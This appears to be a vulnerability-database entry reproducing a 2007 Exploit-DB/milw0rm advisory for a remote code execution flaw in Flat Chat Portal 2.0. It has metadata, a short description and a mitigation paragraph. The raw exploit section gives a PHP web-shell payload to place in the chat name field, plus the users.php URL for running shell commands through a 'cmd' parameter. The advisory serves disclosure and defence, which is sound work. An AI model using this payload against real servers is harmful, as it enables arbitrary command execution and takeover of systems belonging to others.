Vendor: Flat Chat Portal
By: Dj7xpl
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote Code Execution
CWE:
Product Name: Flat Chat Portal
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

Flat Chat Portal Remote Code Execution

Flat Chat Portal version 2.0 is vulnerable to remote code execution. PHP code submitted in the chat name parameter is stored without sanitization and is executed when the users.php page is loaded, so an attacker can run arbitrary commands on the server by passing them in the 'cmd' parameter of users.php.

Mitigation:

Upgrade to a patched version of Flat Chat Portal when one is available, or apply compensating controls (for example, validating and encoding the chat name input so that stored user input is never interpreted as PHP code) to prevent remote code execution.

Exploit-DB raw data:

                                           .-""""""""-.                                 
                                          /   Dj7xpl   \                              
                                         |              |                                
                                         |,  .-.  .-.  ,|                                
                                         | )(_o/  \o_)( |                                     
                                         |/     /\     \|                                 
                               (@_       (_     ^^     _)                  
                          _     ) \_______\__|IIIIII|__/_______________________________
                         (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                )_/        \          / 
                                (@
+_______________________________________________________________________________________________________________________+
+
+
+                               +=============================================+
+                               |                                             |
+                               | Portal   : Flat Chat                        |
+                               | Version  : 2.0                              |
+                               | Author   : Dj7xpl  | Dj7xpl@yahoo.com       |
+                               | Download : Http://www.undoweb.frih.net      |
+                               | Risk     : High (Remote Code Execution)     |
+                               |                                             |
+                               +=============================================+
+
+              Exploit : 
+                         Http://localhost/flatchat/index.php   <<<<<<  Open Index Page
+
+                         Insert This Script In Chat Name:  e.g:  <?php passthru($_GET[cmd]); ?>
+
+                         Http://localhost/flatchat/users.php?cmd=ls -la   <<<  Enter Your Command
+
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-07]